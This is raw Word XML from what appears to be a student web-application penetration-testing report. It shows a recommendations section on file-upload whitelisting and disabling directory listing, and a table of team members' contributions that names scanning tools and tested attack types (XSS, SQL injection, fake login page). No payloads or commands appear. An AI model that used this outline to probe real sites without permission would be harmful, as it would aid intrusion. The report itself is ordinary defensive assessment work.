    <w:p w14:paraId="47C747B1" w14:textId="77777777" w:rsidR="00430C74" w:rsidRDefault="00E82923" w:rsidP="00E82923">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc93487315"/>
      <w:bookmarkStart w:id="164" w:name="_Toc93502894"/>
      <w:bookmarkStart w:id="165" w:name="_Toc93526930"/>
      <w:bookmarkStart w:id="166" w:name="_Toc94100261"/>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="164"/>
      <w:bookmarkEnd w:id="165"/>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="7BA23DB1" w14:textId="56417DA9" w:rsidR="003338E5" w:rsidRDefault="001211BB" w:rsidP="00137FD3">
      <w:r>
        <w:t xml:space="preserve">Although the vulnerability could not be exploited since it was blocked by the </w:t>
      </w:r>
      <w:r w:rsidR="00C86CB7">
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidR="00C86CB7">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>pplication</w:t>
      </w:r>
      <w:r w:rsidR="00C86CB7">
        <w:t xml:space="preserve"> Firewall (WAF)</w:t>
      </w:r>
      <w:r w:rsidR="00FB5CC5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009B01EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB5CC5">
        <w:t xml:space="preserve">it is good practice to </w:t>
      </w:r>
      <w:r w:rsidR="00BB743B">
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidR="00C20774">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FB5CC5">
        <w:t xml:space="preserve">whitelist </w:t>
      </w:r>
      <w:r w:rsidR="00AF2290">
        <w:t>acceptable file</w:t>
      </w:r>
      <w:r w:rsidR="00493B88">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF2290">
        <w:t>names</w:t>
      </w:r>
      <w:r w:rsidR="00493B88">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00487B1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00493B88">
        <w:t>types to prevent</w:t>
      </w:r>
      <w:r w:rsidR="00FB5CC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA50E8">
        <w:t xml:space="preserve">malicious files from being uploaded into the web application. </w:t>
      </w:r>
      <w:r w:rsidR="00C20774">
        <w:t>Secondly</w:t>
      </w:r>
      <w:r w:rsidR="0012783B">
        <w:t>, t</w:t>
      </w:r>
      <w:r w:rsidR="003338E5">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00FF5B27">
        <w:t xml:space="preserve">web application should </w:t>
      </w:r>
      <w:r w:rsidR="00360B6A">
        <w:t xml:space="preserve">disable directory listing, as an unauthenticated user is able to view the directory and the contents </w:t>
      </w:r>
      <w:r w:rsidR="00B93F06">
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidR="00360B6A">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00B93F06">
        <w:t>director</w:t>
      </w:r>
      <w:r w:rsidR="0012783B">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00B85EF1">
        <w:t xml:space="preserve"> which might con</w:t>
      </w:r>
      <w:r w:rsidR="00B65AD8">
        <w:t>tai</w:t>
      </w:r>
      <w:r w:rsidR="002D1EC2">
        <w:t>n sensitive information</w:t>
      </w:r>
      <w:r w:rsidR="00B93F06">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85FE97" w14:textId="7F6A72E1" w:rsidR="006E2076" w:rsidRDefault="006E2076" w:rsidP="00A54E6A"/>
    <w:p w14:paraId="6ACECED4" w14:textId="77777777" w:rsidR="00036976" w:rsidRDefault="00036976">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc93487316"/>
      <w:bookmarkStart w:id="168" w:name="_Toc93502895"/>
      <w:bookmarkStart w:id="169" w:name="_Toc93526931"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E5E4DD" w14:textId="329CF174" w:rsidR="00B75964" w:rsidRDefault="00991DB4" w:rsidP="00B75964">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc94100262"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Report </w:t>
      </w:r>
      <w:r w:rsidR="00C83FC9" w:rsidRPr="00147E94">
        <w:t>Contributions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>
      <w:bookmarkEnd w:id="170"/>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345"/>
      </w:tblGrid>
      <w:tr w:rsidR="00290A0B" w14:paraId="5BCD9F4A" w14:textId="77777777" w:rsidTr="00B42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gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="047A1D95" w14:textId="71B98960" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Report Contributions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="34588E72" w14:textId="77777777" w:rsidTr="00B4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A64C2A1" w14:textId="566EBDF7" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Team Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="068B9826" w14:textId="08599FFE" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611A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81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Contributions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="0C1A85DD" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="445D7E6F" w14:textId="65060A29" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00E079B1">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Kok Jia Cheng, Glenn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="238DD02F" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Network Resources:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C84C0E" w14:textId="4F8B06B9" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">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DNSRecon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="2CA045B2" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="708E1B6A" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60CAEE05" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Internet/WWW:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16BEB130" w14:textId="15CC7C58" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611A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SubBrute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="5EDDBAB3" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="1B9E8D8A" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A898DA2" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00B73086" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Profiling Web Architecture Infrastructure &amp; Technologies used:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="329BBB71" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00B73086" w:rsidP="00C611AC">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Netcraft</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78FC5A2D" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00785E0D" w:rsidP="00C611AC">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Wafw00f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA8B2BD" w14:textId="10110BBF" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="00785E0D" w:rsidP="00C611AC">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CodeinWP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="03FE3107" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="7B504E26" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15A5557D" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00235EB3" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Operating System and Services:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D301F0" w14:textId="52800DFC" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="00235EB3" w:rsidP="00C611A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Services Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="45CB21D9" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="49AB8F0B" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15929C21" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Mapping of Directories &amp; Resources:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559B66FF" w14:textId="4A7A50F1" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611A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OWASP ZAP (Spidering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="1AC4B072" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="7E4B8774" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DF9415F" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Scanning:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC63C4A" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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SkipFish</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F3AE5E7" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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OWASP ZAP (Active Scan)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB43C6B" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="005B5172" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>XSSSniper</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="329860C2" w14:textId="08A29F2A" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005B5172" w:rsidP="00C611AC">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Pr>
                <w:rFonts w:cs="Arial"/>
                <w:bCs/>
              </w:rPr>
              <w:t>OWASP ZAP (XSS Fuzzer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="0382F5C2" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="06B1C136" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BFA6F9B" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Manual Testing:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7891BE0C" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">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Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B2BDB3" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">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SQL Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="558B3D2D" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRDefault="0066332B" w:rsidP="00C611AC">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Broken Access Control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C4DE624" w14:textId="69ED6480" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="00815E8D" w:rsidP="00C611AC">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X-Frame-Options</w:t>
            </w:r>
            <w:r w:rsidR="00363F62">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Header Not Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C73FB" w14:paraId="06FA92B4" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="521ABE8F" w14:textId="77777777" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="005C73FB" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10408A3E" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Proof-of-Concept &amp; Post Exploitation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="732EABB3" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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Fake Login Page (XSS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E3B2800" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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Broken Access Control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="670D5ECB" w14:textId="2E61EFD9" w:rsidR="005C73FB" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="4DEC3D1B" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1CDE5A2D" w14:textId="41A72637" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00E079B1">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Colin Foo Chi Yang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49EA255B" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Network Resources:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193629BF" w14:textId="0F159462" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">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DnsEnum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="46C3168D" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="1657F66C" w14:textId="77777777" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74F0C264" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Internet/WWW:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479553F7" w14:textId="3CEFBDED" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00FB5C90" w:rsidP="00C611AC">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theHarvester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="476F931E" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="454507AC" w14:textId="77777777" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBA49F1" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00B73086" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Profiling Web Architecture Infrastructure &amp; Technologies used:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04443345" w14:textId="4A0A6465" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00B73086" w:rsidP="00C611AC">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Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="23E33F93" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="1E6BB074" w14:textId="77777777" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7420CD77" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00235EB3" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Operating System and Services:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245D21B7" w14:textId="2DD233FA" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00235EB3" w:rsidP="00C611AC">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Opened Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD494B" w14:paraId="10DBA557" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2A376DC1" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03E7009A" w14:textId="77777777" w:rsidR="00A0782E" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Scanning:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9F8733" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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Nessus</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7A60AD" w14:textId="71F6CB52" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00ED0FA1" w:rsidP="00C611AC">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Wapiti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD494B" w14:paraId="2C635964" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="5562C1F0" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
